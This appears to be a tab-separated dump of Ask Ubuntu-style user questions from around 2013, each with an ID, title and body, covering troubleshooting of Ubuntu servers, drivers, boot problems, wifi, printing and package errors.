344909	basic security ubntu 12.04 lamp server quesrions	i have a few questions about security on my ubntu 12.04 lamp server ( newbie ) this is what iâ´ve done so far : install and configure firewall - ufw secure shared memory - fstab ssh - disable root login and change port / adding ssh-key protect su by limiting access only to admin group harden network with sysctl settings disable open dns recursion and remove version info - bind9 dns prevent ip spoofing harden php for security restrict apache information leakage install and configure apache application firewall - modsecurity protect from ddos ( denial of service ) attacks with modevasive scan logs and ban suspicious hosts - denyhosts and fail2ban intrusion detection - psad check for rootkits - rkhunter and chkrootkit scan open ports - nmap analyse system log files - logwatch selinux - apparmor audit your system security - tiger -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- i am also using cloudflare which has some security features out of the box . but should i install some sort of antivirus on my server ? ( i only have outgoing email , eg users register on my site and gets a email link sent ) so i am blocking all incomming emails to the server by loopback-only . should i block ping-requests to my site ? or is it not a problem letting people ping my site ? ping mysite.com ... off-topic , my server seems to do a reboot on its own every sunday morning 7am . i havent started this my self with cron-jobs or so , but is there a way to disable it from doing self-reboot every sunday morning ? mostly coz some settings gets lost after a self-reboot has been done . lastly , i am running a cron-job to do a run a function by calling : mysite.com/some-cron-job ? secretkey=8934958398457 is it safe to use this method ? secretkey=8934958398457 then using php to check `` secretkey '' value and then run the cron-job if its equal to `` 8934958398457 '' is there anything else i should do in order to make my server more secure ? thanks in advance !
344911	why is my cups print spooler starting ?	i do n't have a way to connect my computer to a printer right now so i 'm trying to install cups ; however , i 'm failing . i installed it , but when i try to connect i get this error , in my printing settings : there was an error during the cups operation : 'failed to connect to server ' . the troubleshoot says : the cups print spooler does not appear to be running . to correct this , choose system- > administration- > services from the main menu and look for the 'cups ' service well , i have `` system '' in my menu but i do not have an `` administration '' menu ; therefore , i do n't have the services menu either . i get this error when i use terminal sudo /etc/init.d/cups start [ sudo ] password for kristenxoxox : rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service cups start initctl : unknown job : cups since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start cups ( precise ) kristenxoxox @ localhost : ~ $ sudo start cups start : unknown job : cups ( precise ) kristenxoxox @ localhost : ~ $ start cups bash : start : command not found ( precise ) kristenxoxox @ localhost : ~ $ service cups start /usr/bin/service : 123 : exec : start : not found so what do i do ?
344912	can only open bukkit.sh with java web start	i 'm trying to run bukkit.sh file with java 7 runtime . instead the only application i can associate the bukkit.sh java file is java web start . i 've done the basics , installed java7 , set the bukkit.sh file to be executable .
344914	installing 12.04 from 12.10 with black screen issue	i recently upgraded from 12.04 to 12.10 and now have an issue with a black screen upon booting . im having a lot of trouble with this issue and i dont care to fix it anymore . i still have the usb drive that i used to install 12.04 from windows 7. can somebody please , please run me through how to get back to using 12.04 it would be much appreciated .
344915	how do i install drivers for webcams ?	currently when i plug in any usb webcam , the drivers does not load . my linux kernel version is 3.6.10 . i tried the ov51x modules as shown in https : //help.ubuntu.com/community/ov51x however the links to download the modules are dead . is there any other ways i can get my webcam drivers to load ?
344917	i tried booting up ubuntu but it automatically booted into grub . how can i get onto my computer from there ?	i have my hard drive partitioned with windows so i can get on windows but ubuntu automatically brings me to grub 2 . does anyone know how i can just get onto ubuntu ? i do n't want to mess with too much . i just want a clean boot up .
344922	im having login issues after reinstall	i installed ubuntu 12.04 with wubi on windows 7. i had it installed previously but uninstalled and reinstalled it and it worked fine . i had an issue with my belkin n300 micro usb wifi adapter so i had to shut it down , and take it to the ethernet cable . i started it back up and at the ubuntu login screen it starts the startup sound and sticks , the mouse an keyboard are unresponsive , then the screen turns purple with random characters . i tried uninstalling and reinstalling and that does n't work . i ca n't even reboot properly due to the unresponsive keyboard . i have emachines el1358g-51w comp with amd athlon ii x2 220 dual core , nvidia geforce 6150se graphics , 3gb ddr3 ram.this comp used to run ubuntu perfectly and i didnt even have issues with the wifi adapter . first how do i get ubuntu running . second , how do i get my wifi adapter to work ?
344924	having trouble locating files that are filling up disk space	i 'm still getting used to linux and i finally had my media server up and running but now my boot partition is full and mediatomb is longer sharing files ( i think the issues are related since they happened about the same time ) . i am running ubuntu 12.04 server and when i logged in the other day my partition usage was up to 99 % of a 25 gb partition . i ca n't figure out what files are taking up all the space and i 've been searching the internet for a couple days now trying to find a way to identify what is doing this . i have separate partitions for system files and other files that are shared on the network ( sda1 for the boot files and sda2 for my shared files which also shows up as sda5 as it is set up as a logical volume ) . any help would be greatly appreciated !
344929	two radeons switcheroo just does n't work	i 've trying to get this to work for a couple weeks now . most of what i 've found involves one intel and one radeon . my laptop has two radeons and both are powered on at boot for some reason causing my laptop to run hot . ubuntu uses the integrated . cat output if this is helpful : 0 : igd : + : pwr:0000:01:05.0 1 : dis-audio : : pwr:0000:02:00.1 2 : dis : : pwr:0000:02:00.0 using the following line i can turn off the discrete video : echo off > /sys/kernel/debug/vgaswitcheroo/switch but what i really want is to get the integrated permanently turned off and the discrete permanently turned on . unfortunately i have no bios option for it . these commands do nothing -- it does n't switch : echo dis > /sys/kernel/debug/vgaswitcheroo/switch echo ddis > /sys/kernel/debug/vgaswitcheroo/switch i even created the hybrid file following the directions at : https : //help.ubuntu.com/community/hybridgraphics nothings different . i followed every single step . i also tried the amd drivers from their site but that kills my installation every time ( hangs during boot ) . i have an hp pavilion dv7-4263cl laptop running ubuntu 13.04 . is there anything i can try doing or have i done it all already ? switching was working under windows .
344930	lost x randomly ( ubuntu now only boots to terminal )	i have ubuntu 12.10 x64 running in a vm in virtualbox . i was writing some code , and then i minimized the vm window for a few seconds . i tried to open it back up , and it crashed ( or had crashed sometime when it was minimized ) . when i restarted , x was no longer starting , but i was able to log in to terminal and access my file system . i did just change my screen configuration today ( from gnome 's `` displays '' configuration window ) to 2 screens instead of 1 . it was working just fine for hours and then this happened . anyway , this is what i see with dmesg : [ 32.168521 ] console : switching to colour frame buffer device 80x30 [ 32.168532 ] fb0 : vesa vga frame buffer device ... [ 35.114612 ] init : lightdm main process ( 1014 ) terminated with status 1 [ 50.270170 ] init : failsafe-x main process ( 1347 ) terminated with status 1 startx gives me this : [ 487.758 ] ( == ) no layout section . using the first screen section . [ 487.758 ] ( == ) no screen section available . using defaults . [ 487.758 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 487.758 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 487.758 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . ... [ 487.778 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 487.778 ] fatal server error : [ 487.778 ] no screens found [ 487.778 ] ( ee ) ... sudo xorg -configure gives me this : ( ++ ) using config file : `` /home/xxx/xorg.conf.new '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' number of created screens does not match number of detected devices . configuration failed . after checking the xorg.conf.new file , it shows 3 screens and 3 devices . i only have 2 monitors , though . i tried changing my vm configuration between 1 and 2 screens -- neither configuration worked . not sure what else to try .
344931	any tips to improve my computer performance ? ( acer revo )	i 'm kinda new here . i have a acer revo r3610 and i 've already have installed ubuntu 12.04 but it did n't run very well and now i 'm trying 13.04 and it 's working much better . the thing is , i believe this computer is able to run this os like a charm and i do n't know what is missing or what i 'm not doing well . the unity dashbord is running ok but the 'in browser ' performance is not the best . i 'm having slow scrols and overall average performance . the specs : intel® atom™ cpu 330 @ 1.60ghz × 4 gpu ion/integrated/sse2 2gb ram i installed the latest drivers for the gpu , i changed to gnome fallback ( no effects ) and also decreased swap use to 20 ( in a scale from 0 to 100 / default is 60 ) . please help me , i know there are people with the same pc running ubuntu like a charm ( i 'm a little picky ) .
344933	constant authenticationpassword for wifi and not finding server on	ubuntu 12.04.03 needs constant authentication password for wifi and not finding server on hp pavilion g6 i3 core 64bit . i had atheros ar9285 802.11 b/g wifi adapter and realtek pcie fe family controller s the network adapters for windows drivers when windows seven was installed and it worked great for windows 7 os . how do i get my wifi to work without asking me for authentication password for wifi and allowing me internet access on my search engine ?
344934	speakers playing faint white noise when turned on	my speakers are constantly playing a a faint white noise when they are turned on , it only started happening when i put ubuntu on it as well . my machine is a new lenovo thinkpad x1 carbon . other questions similar to mine are n't helping either . thanks !
344937	unmet dependencies , error parsing file	i 'm having trouble with apt-get . when i try to install something , it tells me , that some packages has unmet dependencies , and i should run apt-get -f install to correct them . when i do so , i get the following error tux @ netbook : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libqt4-network the following packages will be upgraded : libqt4-network 1 upgraded , 0 newly installed , 0 to remove and 12 not upgraded . 39 not fully installed or removed . need to get 0 b/551 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : error : parsing file '/var/lib/dpkg/status ' near line 37020 package 'apparmor ' : field name ` '' /etc/apparmor.d/abstractions/ubuntu-xterm ' must be followed by colon e : sub-process /usr/bin/dpkg returned an error code ( 2 ) in the last line , it says sth with dpkg : error : parsing file ... . i can do a sudo apt-get update , sudo apt-get clean and sudo apt-get autoclean which works , but does n't solve the error above . i also tried the answer from dpkg : error : parsing file '/var/lib/dpkg/available ' near line 0 sudo dpkg -- clear-avail , sudo apt-get update which works , but does n't solve the problem either . i googled around , but could n't find a solution . something with the libqt4-network packages seems to be wrong , but how could i fix this ? i also tried clean and autoclean , but none of them worked .
344939	ubuntu wo n't boot isolinux.bin	so i made a bootable usb drive with the ubuntu iso . i boot from the usb stick just fine and go through the normal steps of installing the os . i 've tried just letting it decide how to handle it , doing it myself ( defining main partition , swap partition , etc ) . i do n't know what 's wrong because i installed linux mint last week ( was switching from windows and wanted to try something new ) using the same exact method . i try looking for help but most people have the problem of not being able to boot from the usb when they get this error .
344941	mysql not working because of unknown instance	$ sudo service mysql restart stop : unknown instance start : job failed to start in my ubuntu , i can only find the service mysql , but can not find the service mysqld this problem occurs when installing devstack . could someone give me some advice ? thanks a lot !
344942	how to enable touch on hp envy 15t ?	i am relatively new to ubuntu and i recently installed ubuntu 12.04.2 on my new hp envy touchsmart 15t . everything works fine , except the touchscreen . it works under windows 8 , but not ubuntu . i installed xinput-calibrator and was told that no calibratable devices are found . i suspect there is a missing driver or something of the sort . i also installed utouch to no avail . the command xinput -list does not show a touchscreen . running lsusb presents me with several devices : chicony electronics co. , ltd ( id 04f2 : b3a6 ) d-wav scientific co. , ltd ( id 0eef : a103 ) validity sensors , inc. ( id 138a:0050 ) how can i get the touchscreen to work ?
344944	trouble installing ubuntu .	i have a blank 1tb hard drive that i have run ubuntu on before . i recently formatted it and am trying to reinstall ubuntu 12.04 lts on there . using the universal usb installer and the 64-bit iso file , i booted up my computer with only my 1tb hard drive connected . i go through the installation process normally , until i restart my computer at the end . once restarted , i start to experience the problem deal with here . when i run it normally , it goes to a black screen with a blinking cursor . when i select the `` recovery mode '' option , a bunch of lines scroll across the screen , the last of which is `` hostap_pci : registered netdevice wifi0 '' . it then stops there with a blinking cursor . when i follow the instructions on the page i linked to ( replacing `` quiet splash '' with `` nomodeset '' ) and bunch of lines scroll through after i press ctrl+x . the last line displayed is adding 8386556k swap on /dev/sda5 . priority : -1 extents:1 across : 8386556k it then stops there with a blinking cursor . how do i fix this problem ?
344945	acer aspire r7 with touchscreen	i just got an acer aspire r7 and it has a touchscreen . can i install ubuntu on it and with the touchscreen work ? i 'm planing on install it soon .
344946	mobile broadband	i dual boot windows 8.1 and ubuntu 13.04.with a usb sierra mobile router . until recently both systems connected to internet almost instantly -- windows still does . ubuntu does not . it can take 30 minutes to eventually connect to telstra mobile by using the icon in the task bar continuously . i further note that telstra 4g and lte have arrived at my location , previously only 3g . could this be the reason . any suggestions ..gratefully received further info ... my android phone , my iphone and my printer are all connected but not ubuntu 13.04
344947	what version of ubuntu should i install ?	i 'm fairly new to linux and i 'm not sure which version of ubuntu linux i should install .
344949	`` unable to burn ubuntu not recognized ''	why am i getting the following message on my mac book pro when i try to create a ubuntu ios installation dvd through the disk utility application on mac `` unable to burn ubuntu not recognized '' can someone please tell me what i need to do.thanks .
344950	problem in piping the output of one command to other	i want to recursively sort all the file in the present directly . i tried ls -lh -r |sort > > output.txt . but i think multi-threading problem is creating a problem , before complete output of ls -lh -r , the sort has started to do it 's work . now i 'm getting wrong answer . how can i do it properly . i was trying to : answer this question
344953	how to perform something like windows domain or active directory in ubuntu environment	i am already running old windows 2008 server used for dns server and domain server . my users can use the office computer only if they have username registered in the domain server . also , domain server makes it easy for clients to share files and devices and assign specific domain user who can use it . does linux ( especially ubuntu ) has similar technology ? i searched about nis for some times , can i use that for the purpose ? we are thinking to go to all linux environment using ubuntu server and ubuntu desktops . but i also heard that nis is old and dying technology . is there better tech for windows domain like support . back when i studied in sjsu , the computer lab for the cs department has three labs with windows , linux , and sun unix that all of them share the same user login . i created a user in the windows computer lab and immediately i can access the sun and the linux lab using the same username and password , and i can share my files saved in the central server throughout the three labs . please help and thank you in advance rendra
344954	sounds play through both speakers of the laptop and headphone	i 'm using a hp pavilion g6 laptop . sounds play through both speakers of the laptop and headphone . kindly requesting for a solution . thank you !
344955	unable to get any new updates	i get failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-3_1.4.18-1ubuntu1.1_i386.deb 404 not found [ ip : 91.189.92.201 80 ] and series of other errors when i try to update .
344961	how ubuntu behaves in touch screen laptop ?	i 'm planning to buy hp pavillion touchsmark sleekbook 14 ( model # b172tx ) . it 's a touch notebook with w8 pre-installed.i would like to install ubuntu 12.04 ( as dual boot ) and i have a concern how ubuntu behaves since it is a touch notebook . is it a right decision or should i go with a non-touch laptop instead , since ubuntu is must for me . please advice .
344962	how do i correct this error with debootstrap in ubuntu server 12.04.3 ?	when using the tool xen-create-image i get an error with the debootstrap process . running root @ xen/tmp # debootstrap -- arch amd64 precise /tmp/ubuntu i : retrieving release i : retrieving release.gpg i : checking release signature i : valid release signature ( key id 630239cc130e1a7fd81a27b140976eaf437d05b5 ) i : retrieving packages i : validating packages i : resolving dependencies of required packages ... i : resolving dependencies of base packages ... i : checking component main on http : //us.archive.ubuntu.com/ubuntu ... i : retrieving adduser ... i : extracting xz-utils ... i : extracting zlib1g ... i : installing core packages ... w : failure trying to run : chroot /tmp/ubuntu dpkg -- force-depends -- install /var/cache/apt/archives/debconf_1.5.42ubuntu1_all.deb so i tried running : chroot /tmp/ubuntu dpkg -- force-depends -- install /var/cache/apt/archives/debconf_1.5.42ubuntu1_all.deb interactively . root @ xen : / # chroot /tmp/ubuntu dpkg -- force-depends -- install /var/cache/apt/archives/debconf_1.5.42ubuntu1_all.deb ( reading database ... 1944 files and directories currently installed . ) preparing to replace debconf 1.5.42ubuntu1 ( using ... /debconf_1.5.42ubuntu1_all.deb ) ... illegal instruction ( core dumped ) dpkg : warning : subprocess old pre-removal script returned error exit status 132 dpkg - trying script from the new package instead ... illegal instruction ( core dumped ) dpkg : error processing /var/cache/apt/archives/debconf_1.5.42ubuntu1_all.deb ( -- install ) : subprocess new pre-removal script returned error exit status 132 debconf : unable to initialize frontend : dialog debconf : ( no usable dialog-like program is installed , so the dialog based frontend can not be used . at /usr/share/perl5/debconf/frontend/dialog.pm line 76 . ) debconf : falling back to frontend : readline debconf : unable to initialize frontend : readline debconf : ( ca n't locate term/readline.pm in @ inc ( @ inc contains : /etc/perl /usr/local/lib/perl/5.14.2 /usr/local/share/perl/5.14.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.14 /usr/share/perl/5.14 /usr/local/lib/site_perl . ) at /usr/share/perl5/debconf/frontend/readline.pm line 7 . ) debconf : falling back to frontend : teletype illegal instruction ( core dumped ) dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 132 errors were encountered while processing : /var/cache/apt/archives/debconf_1.5.42ubuntu1_all.deb the output : illegal instruction ( core dumped ) seems to imply some fundamental problem with debconf or something . is there a way to work around this problem so i can get the debootstrap script to run without errors ?
344963	how to install amd legacy drivers in ubuntu 12.04.3	i have a amd 4xxx series graphics card on my laptop . ubuntu 12.04 is the last iteration of ubuntu which had support of proprietary amd legacy drivers . however , upon downloading the latest lts release ubuntu 12.04.3 , i found that that support has gone too . is there a way to install proprietary drivers again ? the laptop in its current form is overheating badly . is there any other flavor of ubuntu which still supports the proprietary drivers ?
344964	usb 2.0 not working in my ubuntu 13.04 dell xps 13	i have ubuntu 13.04 installed on my dell xps 13 ultrabook . i need to get the usb 2.0 port on the left side of the ultrabook to read my pendrive . when i plug it in , nothing happens . it works fine with the usb 3.0 port on the right side though . my pendrive is 2.0 , so this is really puzzling me . how can i get my usb 2.0 port to recognize my pendrive ? ( i need to do this in order to boot windows 7 from my pendrive )
344965	can not unlock my wd passport	i can not get this sucker to to work , this is the message i get archive : /media/wd unlocker/wd drive unlock.exe [ /media/wd unlocker/wd drive unlock.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . note : /media/wd unlocker/wd drive unlock.exe may be a plain executable , not an archive zipinfo : can not find zipfile directory in one of /media/wd unlocker/wd drive unlock.exe or /media/wd unlocker/wd drive unlock.exe.zip , and can not find /media/wd unlocker/wd drive unlock.exe.zip , period .
344970	ubuntu compatibility with new apple mac pro hardware	apple 's new mac pro is being released this fall . the hardware specs look great , but i also do n't have enough understanding of hardware , hardware drivers , and linux kernel to make an educated guess as to whether ubuntu will be able to take advantage of all of the hardware upgrades ( because i 'm planning on purchasing it then dual-booting ubuntu ) . the upgrades i 'm specifically interested in are the alleged increased i/o throughput on ssd and their ram . so , if i were to dual boot - could i expect ubuntu to perform operations at a similar speed to osx ?
344976	can i install 32-bit ubuntu in a 64-bit host using virtualbox ?	after countless problems trying to program nasm assembly in a 64-bit ubuntu install in virtualbox , i figured i 'd just go to 32-bit programming for now . i 'm no expert - can i install 32-bit ubuntu in virtualbox , where the host is 64-bit ?
344977	eclipse kepler on 12.04	i am using ubuntu 12.04lts ( 32-bit ) . i am currently installing eclipse kepler using this post . i 've finished the process but i ca n't get the eclipse display on the menu search . currently , the eclipse icon is displayed along with its image , but the icon itself ca n't be clicked/entered . i have installed oracle jdk 7 provided by this tutorial . this i miss something that caused the icon/application to not run and/or can not be clicked ?
344980	xdmcp login gets black working area of unity-2d-shell	this is a xdmcp server running precise that work well . and the desktop is unity-2d . the clients using ubuntu precise server work , too . now we are trying a thin client hardware with very little flash . so we chose tinycorelinux 4.x as the client os . when using xorg 7.6 of tcl4.x to connect to server , lightdm showed ok. after login , wallpaper showed , then the topbar ( the one with indicators/clock ) . then the working area became black as soon as the launch bar ( on the left ) appears . if i started a program , like gnome-terminal , the topbar showed its title , and its menu when mouse hovered , the leftbar showed its icon . but there was nothing in the working area shown . when i pressed alt-tab , the window switch panel showed with gnome-terminal on it . and the double-lined border of gnome-terminal showed . and workspace switching , screen lock and unlock worked fine . what should i do ? is it nautilus ?
344984	how do i install wine setup ?	how do i set up wine . i am getting this error : setup started on 201309130817 . error : could not find wine installation . setup wine
344989	help with dual-booting ubuntu	i was trying to dual-boot with windows 8 on my lenovo y-500 recently , but i gave up because there were so many difficulties . couple hours ago i decided to try again , but i 'm running into some difficulties . i received the error : executing 'grub-install/dev/sda ' failed . this is a fatal error when installing ubuntu alongside windows 8 . i turned my computer off , made sure my secure-boot was off , legacy support turned on , with priority on uefi . i retried , but ran into the same error message , so i ran boot repair . i came across what appeared to be a concerning error message here : i 'm a little apprehensive at this step because there were some errors in the terminal and i have no idea what a kernel is and renaming efi files seems potentially dangerous . any help would be enormously appreciated . thanks ! edit : hit `` no '' in the second screenshot , and bootrepair continued . i got this url : http : //paste.ubuntu.com/6100240/ edit # 2 : ran installation again after boot-repair finished , got the same `` executing 'grub-install/dev/sda ' failed . this is a fatal error '' error message -.-
344991	is there any way to decrease the speed of the joystick cursor ?	i 'm using my joystick as the mouse ( xserver-xorg-input-joystick ) , but having trouble with the speed of the cursor . is there any way to decrease the speed of the joystick cursor ? please help .
344992	wacom setting `` map to monitor '' not saving	i 've got a first generation bamboo tablet , and i wanted to use it in my ubuntu install . i go to try to change which monitor it effects , but no matter which monitor i select , the setting does n't save and it does n't change which monitor i can use my tablet for .
344995	video thumbnail quality in nautilus - is it controllable ?	i 'm not sure if it is nautilus itself or ffmpeg codecs that generate these thumbnails , but is there any way we could control its quality , time frame , border etc ?
344997	driver issues with usb wireless adaptor	i am having trouble with a usb wireless adaptor . its a 150m usb wifi wireless lan 802.11 n/g/b adapter . i am using 12.04 . in terminal i have tried a few things . i ran lsusb and got the results : bus 002 device 004 : id 148f:3070 ralink technology , corp. rt2870/rt3070 wireless adapter bus 003 device 002 : id 046d : c512 logitech , inc. lx-700 cordless desktop receiver bus 005 device 002 : id 04d9:2519 holtek semiconductor , inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub i followed the instructions here , but downloaded the correct driver for my card ( rtl8187l_linux_1041.0209.2012 ) . still wont work with linux , but works fine on windows 7 . it came with an installation cd , so i tried using the instructions from that website but instead having the directory go to the included cd , but the make file is something different . its a 'makedvr ' file . also , the downloaded driver is newer than the driver on the cd . thanks for the help !
345000	updating ubuntu server apt-get gives me - 404 not found	i 'm trying to update a ubuntu server and when i run apt-get update i get a number of errors like the examples below ( note i added some space after http ) . err http : //no.archive.ubuntu.com natty/main sources 404 not found err http : //no.archive.ubuntu.com natty/restricted sources 404 not found and w : failed to fetch http : //no.archive.ubuntu.com/ubuntu/dists/natty/main/source/sources 404 not found w : failed to fetch http : //no.archive.ubuntu.com/ubuntu/dists/natty/restricted/source/sources 404 not found i tried to replace all occurrences of http : //no.archive.ubuntu.com/ with http : //archive.ubuntu.com/ but seems all of these archives are gone ... version of ubuntu : lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 11.04 release : 11.04 codename : natty how can i cleanup this mess ? thanx for any help ! j
345001	gray bar artefacts when gvim window snaps to half screen	i am about the behavior that if you move a window to the very left of your screen then it snaps in to occupy exactly half of the screen . if i do this with a gui-vim window , some ( useless ? ) gray bars occur on the right and in the bottom , see the screen shot . the screenshot also contains the entries of my vimrc that might be of relevance . any ideas how to get rid of this ?
345002	acer aspire v5-131 hard disk clicking	i bought a machine acer aspire v5-131 intel celeron 1017u . everything is working great , found quickly how to fix not working brightness regulation . but was unable to solve hard disk clicking problem ( occurs every 1-3 sec ) . i have only one partition ( / ) , no swap . i tried doing the following solutions found on the net : sudo hdparm -b 254 /dev/sda or sudo hdparm -b 255 /dev/sda neither did stop the clicking . and : gedit /etc/hdparm.conf : /dev/sda { apm = 254 # ( or 255 ) apm_battery = 254 `` ( or 255 ) } the problem does not occur on windows 7/8 at all ( although i removed them completely ) . ubuntu stops the clicking after i connect the power cord . thanks in advance , if anyone knows the solution . tried standard 64 bit version 13.04 and xfce , the results were the same .
345007	typing `` ↑ '' ( upwards arrow ) with a keyboard shortcut	when i 'm programming , i find useful to use some unicode symbol like ← ↓ → to indicate in comments different things . in ubuntu i can type ← ↓ → respectively with alt gr + y , alt gr + u , alt gr + i . but to get the symbol `` ↑ '' i have to type ctrl + shift + u , and then 2191 ( i.e . i have to insert the unicode code ) . is there a shortcut for the upwards arrow ? if there is n't , how could i manually add it ?
345008	where can i submit or read reviews for hardware components ?	looking at the following questions which computers are guaranteed to work ? where can i find information about ubuntu compatible or certified hardware/pc models ? there are some options listed on where we can find information on hardware working ( or not working ) with various ubuntu releases . however now ubuntu friendly is disontinued as was ubuntu ready , and the ubuntu hardware support community wiki . the ubuntu certified programme only lets me search for ready built systems where the manufacturer made certification possible , and where components used seem to work . components other than those used in these systems are not listed . there is no information on poorly supported components , of course . as i build or upgrade my systems myself the information there is of little value when it comes to decide whether a component will work or will have issues . searching for pitfalls from poorly supported hardware by google , user reports here , or in the forums is cumbersome , and it does not always reveal the details needed . what place would i go to read or submit a short review of a hardware component being either that it worked flawlessly out of the box , or that it had issues that may or may not be resolved ?
345015	workspace and dash feature	i 'm new to ubuntu and have no idea what to call this feature . it 's like this : let 's say i have vlc running in workspace 1 , and i have chrome running in workspace 2 . if i click on the application icon on the dash , it should automatically switch me over to the workspace where that app is open . i had this feature on , but when i was playing around with ccsm , i kind of disabled it , and now whenever i click on an app icon , all it does is put something like an arrow mark on the right side of the icon . please help ! i 've been trying to do it by myself but still ca n't find the solution . having great fun while tinkering though .
345018	why does ubuntu boot from flash with the screen turned off ?	i have recently bought a new acer v3-772g laptop and now i 'm trying to install ubuntu using a flash drive . this laptop has uefi , but it can be disabled by switching to legacy mode . i have done it to allow booting from a flash drive and when i boot it up , i can hear the ubuntu welcome sound , but i can see nothing on the screen . it 's not even purple or black , it looks like it is completely turned off . possibly it has something to do with one of the following : the laptop has the nvidia optimus system with intel 4600 and geforce 760m adapters the flash drive has been created by unetbootin instead of ubuntu 's native flash drive creation tool perhaps the uefi legacy mode interferes with the boot process i 'm not sure what to do and how do i even start to diagnose what happens . any help would be greatly appreciated !
345021	what causes the error message `` system running in low graphics mode '' and how can i avoid it ?	i have tried twice to upgrade to 12.04 lts and on both occasions get the above error message . i have read all the stuff on this and nothing works . i have now tried a clean install from a downloaded disc and everything is fine but i am concerned about installing updates as clearly one of them will start the problem again . any suggestions as to what causes the problem and is there a likely update that should be avoided ?
345022	set file as executable from live cd	i 'm writing this from live cd 12.04 . i downloaded ubuntu 13.04 and unetbootin on my external hard drive , now i 'm trying to make bootable usb drive so i can install ubuntu 13.04 but i ca n't open unetbootin because i ca n't set it as executable . can someone help me with this
345023	how to identify killer wireless n 1202 on ubuntu ?	i bought this dell ultrabook ( xps 13 ) with ubuntu and i know dell is known for messing up orders . ( plus i had some problems on the wifi , that 's why i 've been investigating deeper ) . the wifi card on it is supposed to be a killer wireless n 1202 but a a simple sudo lshw -c network gives me *-network description : wireless interface product : ar9462 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:01:00.0 logical name : wlan0 version : 01 serial : < shows the serial number > width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.8.0-30-generic firmware=n/a ip=192.168.3.27 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:16 memory : d0400000-d047ffff memory : bfa00000-bfa0ffff and according to this wiki entry the killer uses the same chipset than the budget ar9462 . so the question , how do i reliably identify that they are giving me the correct stuff without having to crack open this tiny ultrabook ?
345024	why is my ubuntu terminal becoming fully transparent ?	i have downloaded ubuntu 12.04 and i am facing a problem with the terminal . without any particular reason , it suddenly becomes completely transparent ( like the inside part of the window or , at times , the command line alone is disappearing ) and i do n't see what i am writing . i have set it to a 'solid color ' , and i even tried to play with the transparency percentage but the problem persists . any ideas ? thanks
345027	run unetbootin from live cd	is it possible to run unetbootin from live cd , i need it to install ubuntu but i ca n't open because i ca n't set it as executable
345029	mimetypes icons missing in nautilus	i need help for a small issue with the nautilus file manager . the problem is that it dose n't show mimetypes icons for some file types . here 's a screenshot : http : //imageshack.us/photo/my-images/713/t1o5.png you can see that all of these files ( .c++ , .h , .py and .class , and even a lot ofothers ) have the same icon . it 's very hard to distinguish them . i have elementar luna intall on another hard drivve and with pantheon files manager there 's no problem . so i install the same theme icon theme : no effect . i installed pantheon-files : it displays the mimetypes of .py file but not the others . i check if the icons are present in / usr / share / icons / / mimetypes : they are . i try to manually specify an icon with assogiate : no effect . so i need your help for this issue . thank you !
345031	ubuntu 12.4 , wireless does n't work after update	the wireless is not working after update , it can see the wireless networks around , put it ca n't connect , and keep asking for the password , and sometimes it cause kernel panic this is the wireless info *************** info trace *************** ***** uname -a ***** linux marwan-thinkpad-t410 3.2.0-53-generic-pae # 81-ubuntu smp thu aug 22 21:23:47 utc 2013 i686 i686 i386 gnu/linux ***** lsb_release ***** distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise ***** lspci ***** 00:19.0 ethernet controller [ 0200 ] : intel corporation 82577lm gigabit network connection [ 8086:10ea ] ( rev 06 ) subsystem : lenovo device [ 17aa:2153 ] kernel driver in use : e1000e -- 03:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8191sevb wireless lan controller [ 10ec:8172 ] ( rev 10 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec : e020 ] kernel driver in use : rtl8192se ***** lsusb ***** bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 003 : id 17ef:480f lenovo integrated webcam [ r5u877 ] bus 002 device 003 : id 1d57:0008 ***** pcmcia card info ***** ***** iwconfig ***** wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off ***** rfkill ***** 0 : phy0 : wireless lan soft blocked : no hard blocked : no ***** lsmod ***** wl 2906597 0 lib80211 14040 1 wl rtl8192se 94189 0 rtlwifi 95855 1 rtl8192se mac80211 436493 2 rtl8192se , rtlwifi cfg80211 178877 3 wl , rtlwifi , mac80211 ***** nm-tool ***** networkmanager tool state : connected ( global ) - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8192se state : disconnected default : no hw address : < mac address removed > capabilities : wireless properties wep encryption : yes wpa encryption : yes 